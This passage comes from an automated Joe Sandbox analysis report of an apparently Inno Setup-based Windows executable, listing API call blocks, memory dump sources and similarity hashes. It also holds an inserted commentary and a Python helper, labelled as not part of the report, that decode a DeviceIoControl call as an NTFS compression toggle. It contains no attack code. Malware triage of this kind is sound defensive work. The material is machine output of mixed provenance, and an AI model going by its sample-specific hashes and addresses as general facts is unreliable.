• Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
APIs
• SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
• FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
• FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
• FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Find$File$CloseErrorFirstModeNext
• String ID:
• API String ID: 4011626565-0
• Opcode ID: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
• Instruction ID: 9d9184480f8630aada0b530c6bd54f2fc26159d28d851f3c8c43bf9f92f270d6
• Opcode Fuzzy Hash: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
• Instruction Fuzzy Hash: 77418370A00A18DBCF10EFA5DC959DEB7B8EB88305F5044AAF804A7341E7789E448E59
APIs
• SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
• FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
• FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
• FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Find$File$CloseErrorFirstModeNext
• String ID:
• API String ID: 4011626565-0
• Opcode ID: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
• Instruction ID: 85e7d80bc36d7b3e80fea797042c039a90a2821ca6a16b1e557570abf42aa49f
• Opcode Fuzzy Hash: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
• Instruction Fuzzy Hash: 3A41B770A00A589FCB11EF65CC45ADEB7B8EB88705F4044BAF404A7381E67D9F48CE59
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
• DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
• GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
• SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: ErrorLast$CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 1177325624-0
• Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
• Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
• Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
• Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
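The CreateFileA / DeviceIoControl pair in the block above is the kind of call sequence behind the "Contains functionality to communicate with device drivers" signature, and the arguments the report prints are enough to see what it actually does. The control code 0009C040 decodes as CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 16, METHOD_BUFFERED, FILE_READ_DATA | FILE_WRITE_DATA), which is FSCTL_SET_COMPRESSION, and the 2-byte input buffer matches the USHORT compression state that control takes; the handle comes from CreateFileA with GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, OPEN_EXISTING and FILE_FLAG_BACKUP_SEMANTICS (so the target may be a directory). That is an NTFS compression toggle on a file-system handle, consistent with the Inno Setup runtime strings (isRS-???.tmp, "[Code] isn't running yet") in the neighbouring blocks, not a custom driver interface. The script below is an added triage helper and is not part of the Joe Sandbox report: it parses the two API lines exactly as the report prints them and decodes the constants. The constant tables only cover values relevant to this call pair.

```python
"""Decode the CreateFileA / DeviceIoControl pair from a Joe Sandbox API listing.

Added triage helper, not part of the sandbox report. Input lines are copied
verbatim from the report block above.
"""
import re

# The two API entries as printed in the report (constructed input: copied from the page).
REPORT_LINES = [
    "CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,"
    "00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956",
    "DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,"
    "?,00000000), ref: 0042E981",
]

# Joe Sandbox format: Api.MODULE(arg,arg,...), ref: ADDR   ('?' = value not recovered)
API_LINE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Only the constants this call pair can plausibly use are tabled.
ACCESS_BITS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
SHARE_BITS = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAG_BITS = {0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
             0x40000000: "FILE_FLAG_OVERLAPPED", 0x80000000: "FILE_FLAG_WRITE_THROUGH"}
DEVICE_TYPES = {0x9: "FILE_DEVICE_FILE_SYSTEM"}
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
KNOWN_FSCTL = {0x0009003C: "FSCTL_GET_COMPRESSION", 0x0009C040: "FSCTL_SET_COMPRESSION"}


def parse_api_line(line):
    """Split one report entry; hex arguments become ints, '?' becomes None."""
    m = API_LINE.match(line.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox API entry: {line!r}")
    args = [None if a == "?" else int(a, 16) for a in m["args"].split(",")]
    return {"api": m["api"], "module": m["module"], "args": args, "ref": int(m["ref"], 16)}


def names_for_bits(value, table):
    """Name every tabled bit set in value (ascending bit order)."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def decode_ctl_code(code):
    """Undo CTL_CODE(): (DeviceType << 16) | (Access << 14) | (Function << 2) | Method."""
    device = (code >> 16) & 0xFFFF
    access = (code >> 14) & 0x3
    access_flags = [n for bit, n in ((1, "FILE_READ_ACCESS"), (2, "FILE_WRITE_ACCESS"))
                    if access & bit] or ["FILE_ANY_ACCESS"]
    return {
        "device_type": device,
        "device_name": DEVICE_TYPES.get(device, "unknown"),
        "access_flags": access_flags,
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
        "name": KNOWN_FSCTL.get(code, "unknown"),
    }


def triage(lines=REPORT_LINES):
    """Pair the CreateFileA open with the DeviceIoControl issued on the handle."""
    calls = {c["api"]: c for c in map(parse_api_line, lines)}
    cf = calls["CreateFileA"]["args"]       # slots 0..6 are the real parameters;
    dic = calls["DeviceIoControl"]["args"]  # the rest is caller stack the sandbox dumped
    return {
        "open": {
            "access": names_for_bits(cf[1], ACCESS_BITS),
            "share": names_for_bits(cf[2], SHARE_BITS),
            "disposition": DISPOSITION.get(cf[4], "unknown"),
            "flags": names_for_bits(cf[5], FLAG_BITS),
        },
        "ioctl": decode_ctl_code(dic[1]),
        # 2 == sizeof(USHORT): the compression state FSCTL_SET_COMPRESSION expects
        "in_buffer_size": dic[3],
        "out_buffer_size": dic[5],
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(), indent=2))
```

Run on the two lines above, triage() reports FSCTL_SET_COMPRESSION on a FILE_DEVICE_FILE_SYSTEM handle opened OPEN_EXISTING with backup semantics and a 2-byte input buffer. Any IOCTL whose device type is not FILE_DEVICE_FILE_SYSTEM, or whose function/method combination is unknown to the table, is the case that deserves a closer look.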
APIs
• IsIconic.USER32(?), ref: 0048397A
• GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
• ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
• ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Window$Show$IconicLong
• String ID:
• API String ID: 2754861897-0
• Opcode ID: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
• Instruction ID: 3cea9153c2b451a1fdc95e78a984a36fb28f479a74ffefb17a89e5a976076ef3
• Opcode Fuzzy Hash: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
• Instruction Fuzzy Hash: 160156B0705200ABEA00BF659CCBB5F22C55714745F44093BF4459B292CAADDA859B5C
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
                                                                                                                                        • FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3541575487-0
                                                                                                                                        • Opcode ID: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                                                                        • Instruction ID: e6acefadc91213b77ea930f6be1f86c6134c8588622ee3d3acab995ed1c325b6
                                                                                                                                        • Opcode Fuzzy Hash: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                                                                        • Instruction Fuzzy Hash: 87210831904B08BECB11EB65CC41ACEB7ACDB49304F5084B7E808E32A1F6789E44CE69
                                                                                                                                        APIs
                                                                                                                                        • IsIconic.USER32(?), ref: 004241E4
                                                                                                                                        • SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
                                                                                                                                          • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                                                          • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021D25AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
                                                                                                                                        • SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ActiveFocusIconicShow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 649377781-0
                                                                                                                                        • Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                                                                        • Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
                                                                                                                                        • Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                                                                        • Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
                                                                                                                                        APIs
                                                                                                                                        • IsIconic.USER32(?), ref: 00417D0F
                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                                                                        • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                                                                        • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Placement$Iconic
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 568898626-0
                                                                                                                                        • Opcode ID: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                                                                        • Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
                                                                                                                                        • Opcode Fuzzy Hash: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                                                                        • Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CaptureIconic
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2277910766-0
                                                                                                                                        • Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                                                                        • Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
                                                                                                                                        • Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                                                                        • Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
                                                                                                                                        APIs
                                                                                                                                        • IsIconic.USER32(?), ref: 0042419B
                                                                                                                                          • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                                                                          • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                                                                          • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                                                                          • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                                                                        • SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
                                                                                                                                          • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2671590913-0
                                                                                                                                        • Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                                                                        • Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
                                                                                                                                        • Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                                                                        • Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
                                                                                                                                        APIs
                                                                                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NtdllProc_Window
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4255912815-0
                                                                                                                                        • Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                                                                        • Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
                                                                                                                                        • Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                                                                        • Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D
                                                                                                                                        APIs
                                                                                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NtdllProc_Window
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4255912815-0
                                                                                                                                        • Opcode ID: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                                                                        • Instruction ID: 8fc52e73ba06cc46e730b07d7f7f94568764801a7b8f51cd1014d1f63996c257
                                                                                                                                        • Opcode Fuzzy Hash: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                                                                        • Instruction Fuzzy Hash: EC4148B5A44104DFCB10CF99C6888AAB7F5FB49310B64C99AF848DB701D738EE45DB58
                                                                                                                                        APIs
                                                                                                                                        • ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CryptFour
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2153018856-0
                                                                                                                                        • Opcode ID: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                                                                        • Instruction ID: 5effe0378c810cd07e0217cdc1e7a72ed78fe315a0c34b067f2c35eeb24cdbba
                                                                                                                                        • Opcode Fuzzy Hash: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                                                                        • Instruction Fuzzy Hash: D0C09BF200420CBF650057D5ECC9C77B75CE6586547408126F7048210195726C104574
                                                                                                                                        APIs
                                                                                                                                        • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CryptFour
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2153018856-0
                                                                                                                                        • Opcode ID: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                                                                        • Instruction ID: 17600df93846144bfd8e61cd07b91608ca2a028cf3222f5d1774599e6ed580aa
                                                                                                                                        • Opcode Fuzzy Hash: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                                                                        • Instruction Fuzzy Hash: B7A002F0B80300BAFD2057F15E5EF26252C97D0F01F2084657306E90D085A56400853C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2505057540.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2505033769.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2505084610.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10000000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
